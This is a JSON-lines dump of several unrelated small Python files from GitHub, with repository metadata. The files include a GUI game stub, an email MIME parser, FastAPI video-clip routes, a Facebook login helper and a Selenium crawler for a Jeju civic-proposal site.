args.vc_vol, args.sj_vol, \n args.mask_vol, args.mask_mip,\n args.output_dir, 
chunk_size, overlap, offset, size)\n\nif __name__ == \"__main__\":\n main()","repo_name":"Hanyu-Li/EM_mask","sub_path":"em_mask/synapse/analyze_synapse.py","file_name":"analyze_synapse.py","file_ext":"py","file_size_in_byte":17504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15939205619","text":"repostas = []\n\nfor _ in range(5):\n\n x, y = input(\"Digite os valores de x,y separados por uma virgula: \").split(\",\")\n\n z = (int(x)*int(y)) + 5\n\n if z <= 0:\n resposta = 'A'\n elif z <= 100:\n resposta = 'B'\n else:\n resposta = 'C'\n\n repostas.append((z, resposta))\n\nfor resp in repostas:\n print(resp)\n\n","repo_name":"peustratt/python-exercises","sub_path":"introducao_algoritmos_pensamento_computacional/lista_03_condicionais/exercicio_01.py","file_name":"exercicio_01.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6552248788","text":"from tkinter import *\n\nfrom functools import partial # to prevent unwanted windows\nimport random\n\n\nclass Start:\n def __init__(self,parent):\n\n # GUI to get starting balance and stakes\n self.start_frame = Frame(padx=10, pady=10)\n self.start_frame.grid()\n\n # mystery heading (row 0)\n self.mystery_box_label = Label(self.start_frame, text=\"Mystery Box Game\",\n font=\"Garamond 19 bold\")\n self.mystery_box_label.grid(row=1)\n\n # entry box (row 1)\n self.start_amount_entry = Entry(self.start_frame, font=\"Arial 16 bold\")\n self.start_amount_entry.grid(row=2)\n\n # button frame\n self.start_button_frame = Frame(self.start_frame)\n self.start_button_frame.grid(row=3, pady=10)\n\n # play button (row 2)\n self.lowstakes_button = Button(self.start_button_frame, text=\"Low ($5)\",\n highlightbackground=\"orange\",\n command=lambda: self.to_game(1))\n self.lowstakes_button.grid(row=0, column=0, pady=10)\n\n # play button (row 3)\n self.medstakes_button = Button(self.start_button_frame, text=\"Medium ($10)\",\n highlightbackground=\"yellow\",\n command=lambda: self.to_game(1))\n self.medstakes_button.grid(row=0, column=1, pady=10)\n\n # play button (row 4)\n self.highstakes_button = Button(self.start_button_frame, text=\"High ($15)\",\n highlightbackground=\"green\",\n command=lambda: self.to_game(1))\n self.highstakes_button.grid(row=0, column=2, pady=10)\n\n def to_game(self, stakes):\n starting_balance = self.start_amount_entry.get()\n Game(self, stakes, starting_balance)\n\n\nclass Game:\n def __init__(self, partner, stakes, starting_balance):\n print(stakes)\n print(starting_balance)\n\n def reveal_boxes(self):\n # retrieve the balance from the initial function\n current_balance = self.balance.get()\n\n # adjust the balance (subtract game cost and add pay out)\n # for testing purposes, just add 2\n current_balance += 2\n\n # set balance to adjusted balance\n self.balance.set(current_balance)\n\n # edit label so user can see their balance\n self.balance_label.configure(text=\"Balance: {}\".format(current_balance))\n\n\n# main routine\nif __name__ == \"__main__\":\n root = Tk()\n root.title(\"Temperature Converter\")\n something = Start(root)\n root.mainloop()\n\n","repo_name":"sarahwade/mysterybox","sub_path":"start_GUI.py","file_name":"start_GUI.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3469395897","text":"#!/usr/bin/env python3\n\nimport json\nimport 
requests\n\nTOKEN = \"xxx\"\n\nparams = {\n 'access_key': TOKEN,\n 'limit': '1',\n}\n\napi_result = requests.get('http://api.aviationstack.com/v1/flights', params)\n\napi_response = api_result.json()\nwith open('mydata.json', 'w') as f:\n json.dump(api_response, f)\n\n","repo_name":"WikF/flights-storage","sub_path":"old/flight_fetcher.py","file_name":"flight_fetcher.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21229631315","text":"import cv2\nimport numpy as np\n\nfrom model import initialize\n\nface = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\nfont = cv2.FONT_HERSHEY_SIMPLEX\nmodel = initialize()\n\n\nclass VideoCamera(object):\n \n def __init__(self):\n self.video = cv2.VideoCapture(0)\n \n def __del__(self):\n self.video.release()\n \n def get_frame(self):\n _, fr = self.video.read()\n img = cv2.cvtColor(fr, cv2.COLOR_BGR2RGB)\n m = 0\n# img = cv2.resize(img, (224+m, 224+m))\n\n faces = face.detectMultiScale(img, scaleFactor=1.3, minNeighbors=3)\n\n for (x, y, w, h) in faces:\n fc = img[y-m:y+h+m, x-m:x+w+m]\n pred = model.predict(fc)\n cv2.putText(fr, pred, (x, y), font, 1, (255, 255, 0), 2)\n cv2.rectangle(fr,(x,y),(x+w,y+h),(255,0,0),2)\n# break\n \n _, jpeg = cv2.imencode('.jpg', fr)\n return jpeg.tobytes()","repo_name":"HassanRady/Face-Mask-Detector","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"15800961057","text":"#!/usr/bin/python3\n#coding=utf-8\n\n\"\"\"\nFile: mime.py\nDescription: the MIME email parser, reference from:\n \nAuthor: 0x7F@knownsec404\nTime: 2021.06.25\n\"\"\"\n\nimport mimetypes\nimport os\nfrom email.header import decode_header, make_header\nfrom email.message import EmailMessage\nfrom email.parser import Parser\n\n#**********************************************************************\n# @Class: Email\n# @Description: the emailbot warpped Email class, support mutual conversion\n# between MIME format and plaintext.\n#**********************************************************************\nclass Email:\n #**********************************************************************\n # @Function: __init__(self, sender=\"\", receiver=\"\", cc=\"\", subject=\"\", content=\"\",\n # attachment=\"\", source=\"\"):\n # @Description: Email object initialize, and auto convert another format\n # set plaintext email content, it will auto convert to MIME, otherwise.\n # @Parameter: sender=\"\", the email sender\n # @Parameter: receiver=\"\", the email receiver\n # @Parameter: cc=\"\", the email carbon copy\n # @Parameter: subject=\"\", the email subject\n # @Parameter: content=\"\", the email content\n # @Parameter: attachment=\"\", the email attachment file path\n # @Parameter: source=\"\", the MIME email source data\n # @Return: None\n #**********************************************************************\n def __init__(self, sender=\"\", receiver=\"\", cc=\"\", subject=\"\", content=\"\",\n attachment=\"\", source=\"\"):\n # initliaze field\n self.sender = sender\n self.receiver = receiver\n self.cc = cc\n self.subject = subject\n self.content = content\n self.attachment = attachment\n self.source = source\n # MIME object\n self.MIME = None\n\n # convert email string to MIME, or MIME source to string\n if self.source == \"\":\n self._pack()\n else:\n self._unpack()\n # end __init()\n\n 
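# NOTE: the error paths in the methods below call logger.error(), but this\n
    # module never defines a logger; it presumably relies on something like:\n
    #   import logging\n
    #   logger = logging.getLogger(__name__)\n\n
    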
#**********************************************************************\n # @Function: _pack(self)\n # @Description: convert plaintext email to MIME email\n # @Parameter: None\n # @Return: None\n #**********************************************************************\n def _pack(self):\n # create the container email message.\n self.MIME = EmailMessage()\n # set email item into MIME format\n self.MIME['Subject'] = self.subject\n self.MIME['From'] = self.sender\n self.MIME['To'] = self.receiver\n self.MIME['Cc'] = self.cc\n self.MIME.set_content(self.content)\n \n # set attachment into MIME if need\n if self.attachment == None or self.attachment == \"\":\n return\n # read attachment content\n try:\n with open(self.attachment, \"rb\") as f:\n data = f.read()\n except Exception as e:\n logger.error(e)\n return\n # get attachment type\n types, _ = mimetypes.guess_type(self.attachment)\n if types == None:\n # no guess could be made, use a generic bag-of-bits type.\n types = 'application/octet-stream'\n # end if\n maintype, subtype = types.split('/')\n filename = os.path.basename(self.attachment)\n self.MIME.add_attachment(data, maintype=maintype, subtype=subtype, filename=filename)\n # end _pack()\n\n #**********************************************************************\n # @Function: _unpack(self)\n # @Description: convert MIME email to plaintext\n # @Parameter: None\n # @Return: None\n #**********************************************************************\n def _unpack(self):\n # parse the email string to a MIMEMessage object.\n msg = Parser().parsestr(self.source)\n\n # 1.parse header\n self.sender = self._get_header(msg, \"From\", \"\")\n self.receiver = self._get_header(msg, \"To\", \"\")\n self.cc = self._get_header(msg, \"Cc\", \"\")\n self.subject = self._get_header(msg, \"Subject\", \"\")\n\n # 2.parse body\n # if the email contains multiple part\n self.content = self._parse_content(msg)\n # end _unpack()\n\n #**********************************************************************\n # @Function: _get_header(self, msg, key, default)\n # @Description: parse email header data from MIME, and decode with UTF-8\n # @Parameter: msg, the MIME message object\n # @Parameter: key, the key of value\n # @Parameter: default, the default value\n # @Return: value, the value of header field\n #**********************************************************************\n def _get_header(self, msg, key, default):\n # get value by key with default\n value = msg.get(key, default)\n # decode default method\n return str(make_header(decode_header(value)))\n\n #**********************************************************************\n # @Function: _parse_content(self, msg)\n # @Description: parse email content data from MIME, and decode with UTF-8\n # @Parameter: msg, the MIME message object\n # @Return: result, the message plaintext content\n #**********************************************************************\n def _parse_content(self, msg):\n content_type = msg.get_content_type().lower()\n result = \"\"\n\n # if the message part is text part\n if content_type == \"text/plain\" or content_type == \"text/html\":\n # get text content.\n content = msg.get_payload(decode=True)\n charset = msg.get_charset()\n if charset == None:\n # set default charset \"utf-8\"\n charset = \"utf-8\"\n # get message \"Content-Type\" header value.\n ct = msg.get(\"Content-Type\", \"\").lower()\n pos = ct.find(\"charset=\")\n if pos >= 0:\n charset = ct[pos+8:].strip()\n pos = charset.find(\";\")\n if pos >= 0:\n charset = 
charset[0:pos]\n # end if\n # end if\n # end if\n # the encoding in the email may be incorrect, we need to handle\n # with the exception\n try:\n result = content.decode(charset)\n except:\n logger.error(\"content decode failed (%s)\" % str(content))\n result = \"\"\n\n # if this message part is still multipart such as:\n # 'multipart/mixed', 'multipart/alternative', 'multipart/related'\n elif content_type.startswith(\"multipart\"):\n parts = msg.get_payload()\n # loop in the multiple part list.\n for part in parts:\n # parse each message part.\n result += self._parse_content(part)\n\n # if this message part is an attachment part that means it is a attached file\n elif content_type.startswith(\"image\") or content_type.startswith(\"application\"):\n # pass, we not to parse atttachment\n \"\"\"\n # get message header 'Content-Disposition''s value and parse out attached file name.\n attach_file_info_string = msg.get('Content-Disposition')\n prefix = 'filename=\"'\n pos = attach_file_info_string.find(prefix)\n attach_file_name = attach_file_info_string[pos + len(prefix): len(attach_file_info_string) - 1]\n \n # get attached file content.\n attach_file_data = msg.get_payload(decode=True)\n # get current script execution directory path. \n current_path = os.path.dirname(os.path.abspath(__file__))\n # get the attached file full path.\n attach_file_path = current_path + '/' + attach_file_name\n # write attached file content to the file.\n with open(attach_file_path,'wb') as f:\n f.write(attach_file_data)\n \"\"\"\n else:\n # pass, we not to parse other type\n \"\"\"\n result = msg.as_string()\n \"\"\"\n # end if\n return result\n # end _parse_content()\n\n #**********************************************************************\n # @Function: __repr__(self)\n # @Description: rewrite __str__ function, print complete \"Email\" plaintext\n # @Parameter: None\n # @Return: str\n #**********************************************************************\n def __repr__(self):\n text = f\"Subject: {self.subject}\\n\"\n text += f\"From: {self.sender}\\n\"\n text += f\"To: {self.receiver}\\n\"\n text += f\"Cc: {self.cc}\\n\"\n text += f\"\\n{self.content}\\n\"\n text += f\"Attachment: {self.attachment}\"\n return text\n # end __repr__()\n\n #**********************************************************************\n # @Function: __str__(self)\n # @Description: rewrite __str__ function, just call __repr__()\n # @Parameter: None\n # @Return: str\n #**********************************************************************\n def __str__(self):\n return self.__repr__()\n # end __str__()\n# end class\n","repo_name":"0x7Fancy/EmailBot","sub_path":"mime.py","file_name":"mime.py","file_ext":"py","file_size_in_byte":9294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14493379047","text":"import io, os, time\nimport datetime as dt\n\nfrom fastapi import APIRouter\nfrom starlette.requests import Request\nfrom starlette.responses import StreamingResponse, FileResponse\n\nfrom util import log, resize_image\nfrom api.models import ResponseModel\nfrom api.clips import Clips\nfrom adapters.fastapi import MediaResponse, APIException\n\nrouter = APIRouter()\npublic_router = APIRouter()\n\n@router.get(\"/clips\")\ndef clips_list(request: Request, camera: str = \"\", category: str = \"\", date: str = \"\"):\n\n api = Clips()\n # format: /clips/list?camera=&category=&date=20200620\n timestamp = int(time.time())\n if len(date) > 0:\n ts = dt.datetime(year=int(date[:4]), 
month=int(date[4:6]), day=int(date[6:]))\n timestamp = int(time.mktime(ts.timetuple()))\n\n success = True\n results = []\n\n clips = api.get_clips(camera, category, timestamp)\n if clips:\n for clip in clips:\n camera_data = request.app.camera_manager.get(camera)\n results.append({\n \"timestamp\": clip[\"start_time\"],\n \"camera\": {\n \"id\": clip[\"camera\"],\n \"name\": camera_data.name if camera_data else \"[deleted]\"\n },\n \"thumbnail_url\": api.generate_video_url(clip, \"thumbnail\"),\n \"video_url\": api.generate_video_url(clip, \"video\"),\n \"objects\": clip[\"objects\"]\n })\n\n return {\n \"success\": True,\n \"results\": results,\n \"meta\": {\n \"timezone\": api.get_timezone()\n }\n }\n\n@public_router.get(\"/clips/{id}/video/{timestamp}\")\ndef video(request: Request, id: str, timestamp: int):\n\n api = Clips()\n filepath = api.get_video(id, timestamp)\n\n if filepath == False:\n raise APIException(status_code=404)\n\n return MediaResponse(path=filepath, status_code=206, request_headers=request.headers)\n\n@public_router.get(\"/clips/{id}/thumbnail/{timestamp}\")\ndef thumbnail(request: Request, id: str, timestamp: int, resize_to: int = 0):\n\n api = Clips()\n filepath = api.get_thumbnail(id, timestamp)\n if filepath == False:\n raise APIException(status_code=404)\n\n if resize_to > 0:\n with open(filepath, \"rb\") as handle:\n image = handle.read()\n return StreamingResponse(io.BytesIO(resize_image(image, resize_to)), media_type=\"image/jpeg\")\n\n return FileResponse(filepath, media_type=\"image/jpeg\")\n","repo_name":"bzzeke/camera","sub_path":"app/api/routes/clips.py","file_name":"clips.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40995471640","text":"input_file = input(\"Choose the input file name (case sensitive!)\\n\")\r\nfi = open(input_file,'r')\r\n#Read first line to skip column header\r\nfi.readline()\r\n\r\noutput_file = input(\"Choose the output file name (case sensitive!\\n\")\r\nfo = open(output_file,'w')\r\nfo.write(\"abscice\\ valeur\\n\")\r\n\r\n#used variable \r\nis_peak = False\r\nmax_peak = None\r\n\r\nfor line in fi:\r\n #used to treat each line\r\n line = line.strip(\"\\n\")\r\n values = line.split(\";\")\r\n values[1] = values[1][:6]\r\n values[1] = float(values[1])\r\n \r\n if (is_peak):\r\n \r\n #Used to detect the speak end, 1 is an arbitrary value set viewing latis graph)\r\n if (values[1] < 1):\r\n fo.write(max_peak[0]+\" \"+str(max_peak[1])+'\\n')\r\n is_peak = False\r\n max_peak = None\r\n \r\n else:\r\n\r\n #Update maximum in the peak\r\n if (values[1] > max_peak[1]):\r\n max_peak = values\r\n else:\r\n\r\n #Used to detect the speak start, 1 is an arbitrary value set viewing latis graph)\r\n if (values[1] > 1):\r\n is_peak = True\r\n max_peak = values\r\n\r\n#Close file\r\nfo.close()\r\nfi.close()\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"xyo-toy/TipeTool","sub_path":"TipeTool.py","file_name":"TipeTool.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2103298221","text":"# coding=utf-8\n\nimport requests\n\nfrom allauth.socialaccount.models import SocialLogin, SocialToken, SocialApp, SocialAccount\nfrom allauth.socialaccount.providers.facebook.views import fb_complete_login\nfrom allauth.socialaccount.providers.oauth2.views import OAuth2Adapter\nfrom allauth.socialaccount.helpers import complete_social_login\n\nfrom 
applications.accounts.serializer import UserProfileSerializer\n\nFB_GRAPH_API_USER_DATA_URL = 'https://graph.facebook.com/me?fields=id,name&access_token='\n\n\nclass UserSocialRegisterMixin(OAuth2Adapter):\n\n def facebook_signup(self, request, access_token):\n try:\n app = SocialApp.objects.get(provider=\"facebook\")\n token = SocialToken(app=app, token=access_token)\n\n fb_login = fb_complete_login(request, app, token)\n fb_login.token = token\n fb_login.state = SocialLogin.state_from_request(request)\n\n ret = complete_social_login(request, fb_login)\n\n response_data = {}\n\n if request.user.is_authenticated():\n if request.user.username == \"\":\n request.user.username = request.data['email']\n request.user.email = request.data['email']\n request.user.first_name = request.data['fname']\n request.user.last_name = request.data['lname']\n request.user.save()\n data = UserProfileSerializer(request.user).data\n return data\n else:\n return {\n 'error': \"User with this email already exists.\"\n }\n except Exception as e:\n return {\n 'error': str(e)\n }\n\n def validate_facebook_userdata(self, request, accesstoken):\n\n request_data = request.data\n keys = request_data.keys()\n\n url = FB_GRAPH_API_USER_DATA_URL+accesstoken\n resp = requests.get(url=url)\n fb_user_data = resp.json()\n request_user_data = {'first_name':request_data.get('fname'),'last_name':request_data.get('lname'),'email':request_data.get('email')}\n\n valid = all(item in fb_user_data.items() for item in request_user_data.items())\n return valid\n\n def validate_social_account(self, access_token, provider):\n can_signup = False\n if provider == 'facebook':\n url = FB_GRAPH_API_USER_DATA_URL+access_token\n resp = requests.get(url=url)\n fb_user_data = resp.json()\n if 'id' in fb_user_data.keys():\n can_signup = True\n uid = fb_user_data['id']\n accounts = SocialAccount.objects.filter(uid=uid, provider='facebook')\n return (True,can_signup) if accounts.count() > 0 else (False,can_signup)\n return (False,can_signup)\n\n\n\n\n\n","repo_name":"febinstephen/facebook-api","sub_path":"applications/accounts/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3914230351","text":"# 문제 https://www.acmicpc.net/problem/1010\n# 조합 이용해서 풀 수 있음 \nimport math \ntest_num = int(input())\n\nfor i in range(test_num):\n # 서쪽 사이트의 개수는 n, 동쪽 사이트의 개수 m ( n <= m )\n # mCn : 서로 다른 m개 중에 순서 고려하지 않고 n개 선택 \n # mCn = m! / n!(m-n)!\n n, m = map(int,input().split())\n result = math.factorial(m) // (math.factorial(n) * math.factorial(m-n))\n print(result)","repo_name":"pjw5521/Coding_Test_Algorithm","sub_path":"Baekjoon_Algorithm/6. 
Dynamic Programming/1010 다리 놓기.py","file_name":"1010 다리 놓기.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1671155186","text":"#!/usr/bin/env python\n# coding: utf-8\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom bs4 import BeautifulSoup\nfrom time import sleep\nimport requests\nimport re\nimport pandas as pd\nimport numpy as np\nimport os\nimport csv\nimport urllib.parse\n\nfrom selenium.webdriver.common.by import By\n\nimport warnings\nwarnings.filterwarnings('ignore')\nimport time\n\n### Connect to the 가치더함 site\n\naddress_jejudsi=\"https://jejudsi.kr/issue.htm\"\nheader = {'User-Agent': ''}\nd = webdriver.Chrome('./chromedriver.exe')\nd.implicitly_wait(3)\nd.get(address_jejudsi)\n\nreq = requests.get(\"https://www.jejudsi.kr/issue.htm\", verify=False)\nhtml = req.text\nsoup = BeautifulSoup(html, \"html.parser\")\n\n# Project titles\nxpath_tit_new = f'/html/body/div[1]/section/div/div/div[2]/div/div/div/div/div[4]/div[1]/div[1]/div[{1}]/div/div[3]/div[3]/a'\ntitle_new = d.find_element(By.XPATH,xpath_tit_new).text\ntitle = d.find_element(By.CLASS_NAME, 'issue-tit').text\n\nxpath_tit_proj = f'/html/body/div[1]/section/div/div/div[2]/div/div/div/div/div[7]/div[1]/div[2]/div[{2}]/div/div[3]/div[3]/a'\ntitle_proj = d.find_element(By.XPATH,xpath_tit_proj).text\n\nxpath_tit_end = f'/html/body/div[1]/section/div/div/div[2]/div/div/div/div/div[7]/div[1]/div[2]/div[{3}]/div/div[3]/div[3]/a'\ntitle_end = d.find_element(By.XPATH,xpath_tit_end).text\n\n# Project page links\n\nhtml_2 = d.page_source\nsoup_2 = BeautifulSoup(html_2, \"html.parser\")\nlist_issueTit = soup_2.find_all('div', attrs={\"class\" : \"issue-tit\"})\n\nurl_issueTit = list()\n\nfor i in list_issueTit :\n    url_issueTit.append(i.a['href'])\n\nfor p in range(2, 9+1):\n    xpath_cate = f'/html/body/div[1]/section/div/div/div[2]/div/div/div/div/nav/div[2]/ul/li[{p}]/a'\n    d.find_element(By.XPATH,xpath_cate).click()\n    category = d.find_element(By.XPATH,xpath_cate).text # category name\n    print(category)\n\n    # keep clicking the \"more\" button until it disappears\n    path_more ='/html/body/div[1]/section/div/div/div[2]/div/div/div/div/div[7]/div[2]/a'\n    while True :\n        try :\n            d.find_element(By.XPATH,path_more).click()\n        except :\n            break\n\ndef savecsv(data):\n    # name of the output file\n    filename = 'index.csv'\n\n    # read the existing file to check for duplicate rows\n    existing_data = set()\n    try:\n        with open(filename, 'r') as f:\n            reader = csv.reader(f)\n            next(reader) # skip the header row\n            for row in reader:\n                existing_data.add(tuple(row))\n    except FileNotFoundError:\n        pass\n\n    new_data = []\n    for d_ in data:\n        if tuple(d_.values()) not in existing_data:\n            new_data.append(d_)\n\n    with open(filename, 'a', newline='', encoding = 'utf-8') as f:\n        fieldnames = ['id 값', '제목', '분류', \n                    'page', '프로젝트 시작', '프로젝트 종류',\n                    '상세 내용', '제안의 시작', '주요제안(문제정의)', \n                    '해결방안', '링크', '미추진 사유',\n                    '공감투표 참여안내', '참고자료']\n        \n        writer = csv.DictWriter(f, fieldnames = fieldnames)\n\n        if not existing_data:\n            writer.writeheader()\n        for d in new_data:\n            writer.writerow(d)\n\n# crawls a single project page\ndef page_crawler(): \n    col = [\n        'id 값'\n        ,'page'\n        ,'제목'\n        ,'분류'\n        ,'프로젝트 시작'\n        ,'프로젝트 종류'\n        ,'상세 내용'\n        ,'제안의 시작'\n        ,'주요제안(문제정의)'\n        ,'해결방안'\n        ,'링크'\n        ,'미추진 사유'\n        ,'공감투표 참여안내'\n        ,'참고자료'\n        ]\n    df = pd.DataFrame(columns=col)\n    \n    cleantext_reason = list()\n    cleantext_content = list()\n    cleantext_cuase = list()\n    cleantext_suggestion = list()\n    cleantext_solution = list()\n    cleantext_vote = list()\n    cleantext_reference = list()\n\n    # 
Extract the page id from the current URL \n    path_link = d.current_url\n    page_no = d.current_url.replace(\"https://jejudsi.kr/issue/\", \"\").replace(\"#!#none\",\"\").split(\"/\")\n    page_id = page_no[0]\n    page = page_no[1]\n    print(page)\n    print(\"id : \" + page + \"(\" \"link : \" + path_link + \")\") \n    \n    # project type / progress status\n    path_status ='/html/body/div[1]/section/div[1]/div/p[1]/span'\n    status = d.find_element(By.XPATH, path_status).text\n    print(status)\n\n    # project start and end dates\n    try : \n        path_period = '/html/body/div[1]/section/div[2]/div/div[3]/div[1]/div[1]/div/div[2]/h3' # XPath of the tag that shows the voting period.\n        period = d.find_element(By.XPATH, path_period).text.replace(\"공감투표기간 : \",\"\").split(\" ~ \") # period: a string holding the start and end dates; replace() strips the \"공감투표기간 : \" prefix, then split() separates the two dates.\n        start = period[0] \n        end = period[1] \n    except :\n        start = np.nan\n        end = np.nan\n    print(\"date :\", start, \"~\", end)\n\n    # collect the page contents\n    html_test = d.page_source\n    soup_test = BeautifulSoup(html_test, \"html.parser\")\n\n    # mt-3 section\n    list_test = soup_test.find_all('div', attrs={\"class\" : \"card mt-3\"})\n\n    list_list_test = list()\n    for i_list_test in list_test:\n        cleantext = i_list_test.text\n        i_list_test = re.sub(\"\\\\xa0\",'', cleantext) # remove non-breaking spaces.\n\n        if '미추진 사유' in i_list_test[:14] :\n            cleantext_reason.append(i_list_test)\n            cleantext_content.append(\"\")\n            cleantext_cuase.append(\"\")\n            cleantext_suggestion.append(\"\")\n            cleantext_solution.append(\"\")\n            cleantext_vote.append(\"\")\n            cleantext_reference.append(\"\")\n\n        elif '상세 내용' in i_list_test[:14] :\n            cleantext_reason.append(\"\")\n            cleantext_content.append(i_list_test[8:])\n            cleantext_cuase.append(\"\")\n            cleantext_suggestion.append(\"\")\n            cleantext_solution.append(\"\")\n            cleantext_vote.append(\"\")\n            cleantext_reference.append(\"\")\n\n        elif '제안의 시작' in i_list_test[:14] :\n            cleantext_reason.append(\"\")\n            cleantext_content.append(\"\")\n            cleantext_cuase.append(i_list_test.replace(\"\\n\\n제안의 시작 (문제정의)\\n\",\"\"))\n            cleantext_suggestion.append(\"\")\n            cleantext_solution.append(\"\")\n            cleantext_vote.append(\"\")\n            cleantext_reference.append(\"\")\n\n        elif '주요제안' in i_list_test[:14] :\n            cleantext_reason.append(\"\")\n            cleantext_content.append(\"\")\n            cleantext_cuase.append(\"\")\n            cleantext_suggestion.append(i_list_test[12:]) # strip the '주요제안(문제정의)' prefix\n            cleantext_solution.append(\"\")\n            cleantext_vote.append(\"\")\n            cleantext_reference.append(\"\")\n\n        elif '해결방안' in i_list_test[:14] :\n            cleantext_reason.append(\"\")\n            cleantext_content.append(\"\")\n            cleantext_cuase.append(\"\")\n            cleantext_suggestion.append(\"\")\n            cleantext_solution.append(i_list_test[6:]) \n            cleantext_vote.append(\"\")\n            cleantext_reference.append(\"\")\n\n        elif '공감투표' in i_list_test[:14] :\n            cleantext_reason.append(\"\")\n            cleantext_content.append(\"\")\n            cleantext_cuase.append(\"\")\n            cleantext_suggestion.append(\"\")\n            cleantext_solution.append(\"\") \n            cleantext_vote.append(i_list_test[10:])\n            cleantext_reference.append(\"\")\n\n        elif '관련 자료' in i_list_test[:14] :\n            cleantext_reason.append(\"\")\n            cleantext_content.append(\"\")\n            cleantext_cuase.append(\"\")\n            cleantext_suggestion.append(\"\")\n            cleantext_solution.append(\"\") \n            cleantext_vote.append(\"\")\n            cleantext_reference.append(i_list_test[12:])\n\n        else : \n            pass\n    else:\n        pass\n\n    # m-t-10 section\n    list_test = soup_test.find_all('div', attrs={\"class\" : \"card m-t-10\"})\n    list_list_test = list()\n\n    for i_list_test in list_test :\n        cleantext = i_list_test.text\n        i_list_test = re.sub(\"\\\\xa0\",'', cleantext) # remove non-breaking spaces.\n\n        if 
'미추진 사유' in i_list_test[:14] :\n            cleantext_reason.append(i_list_test)\n            cleantext_content.append(\"\")\n            cleantext_cuase.append(\"\")\n            cleantext_suggestion.append(\"\")\n            cleantext_solution.append(\"\")\n            cleantext_vote.append(\"\")\n            cleantext_reference.append(\"\")\n\n        elif '상세 내용' in i_list_test[:14] :\n            cleantext_reason.append(\"\")\n            cleantext_content.append(i_list_test[6:])\n            cleantext_cuase.append(\"\")\n            cleantext_suggestion.append(\"\")\n            cleantext_solution.append(\"\")\n            cleantext_vote.append(\"\")\n            cleantext_reference.append(\"\")\n\n        elif '제안의 시작' in i_list_test[:14] :\n            cleantext_reason.append(\"\")\n            cleantext_content.append(\"\")\n            cleantext_cuase.append(i_list_test.replace(\"\\n\\n제안의 시작 (문제정의)\\n\",\"\"))\n            cleantext_suggestion.append(\"\")\n            cleantext_solution.append(\"\")\n            cleantext_vote.append(\"\")\n            cleantext_reference.append(\"\")\n\n        elif '주요제안' in i_list_test[:14] :\n            cleantext_reason.append(\"\")\n            cleantext_content.append(\"\")\n            cleantext_cuase.append(\"\")\n            cleantext_suggestion.append(i_list_test[12:]) # strip the '주요제안(문제정의)' prefix\n            cleantext_solution.append(\"\")\n            cleantext_vote.append(\"\")\n            cleantext_reference.append(\"\")\n\n        elif '해결방안' in i_list_test[:14] :\n            cleantext_reason.append(\"\")\n            cleantext_content.append(\"\")\n            cleantext_cuase.append(\"\")\n            cleantext_suggestion.append(\"\")\n            cleantext_solution.append(i_list_test[6:]) \n            cleantext_vote.append(\"\")\n            cleantext_reference.append(\"\")\n\n        elif '공감투표' in i_list_test[:14] :\n            cleantext_reason.append(\"\")\n            cleantext_content.append(\"\")\n            cleantext_cuase.append(\"\")\n            cleantext_suggestion.append(\"\")\n            cleantext_solution.append(\"\") \n            cleantext_vote.append(i_list_test[10:])\n            cleantext_reference.append(\"\")\n\n        elif '관련 자료' in i_list_test[:14] :\n            cleantext_reason.append(\"\")\n            cleantext_content.append(\"\")\n            cleantext_cuase.append(\"\")\n            cleantext_suggestion.append(\"\")\n            cleantext_solution.append(\"\") \n            cleantext_vote.append(\"\")\n            cleantext_reference.append(i_list_test[12:])\n\n        else : \n            pass\n\n    else :\n        pass\n\n    new_row = pd.DataFrame({\n        'id 값' : page_id\n        ,'제목' : title\n        ,'분류' : category\n        ,'page' : page \n        ,'프로젝트 시작' : start\n        ,'프로젝트 종류' : status\n        ,'상세 내용' : cleantext_content\n        ,'제안의 시작' : cleantext_cuase\n        ,'주요제안(문제정의)' : cleantext_suggestion\n        ,'해결방안' : cleantext_solution\n        ,'링크' : path_link\n        ,'미추진 사유' : cleantext_reason\n        ,'공감투표 참여안내' : cleantext_vote\n        ,'참고자료' : cleantext_reference\n        }, index=[0])\n\n    df = pd.read_csv(\"_index.csv\", encoding = \"utf-8-sig\")\n    df = df.drop_duplicates(subset=['page', '제목', '분류', '프로젝트 시작', '프로젝트 종류'])\n    df = df.append(new_row,ignore_index=True) # append the new row\n    df.to_csv(\"_index.csv\", encoding=\"utf-8-sig\", index=False)\n\n    return new_row\n\nlist_tag_issueTit = url_issueTit\npage_tag = [\"PROPOSE\", \"RESPONSE\", \"PROJECT\"]\n\ndf = pd.DataFrame()\nfor j in list_tag_issueTit:\n    for i in page_tag:\n        d.get(f'https://jejudsi.kr{j}/{i}')\n\n        path_not_page = '//*[@id=\"main\"]/div/div/div[2]/div/div/div[1]/div'\n        not_page = d.find_element(By.XPATH, path_not_page).text\n\n        if not_page == \"불편을 드려 죄송합니다.\":\n            time.sleep(1)\n        else:\n            test = page_crawler()\n            time.sleep(1)\n\n            df = pd.concat([df, test])\n            df.head()","repo_name":"hyen3030/_DATAEDU","sub_path":"2. 
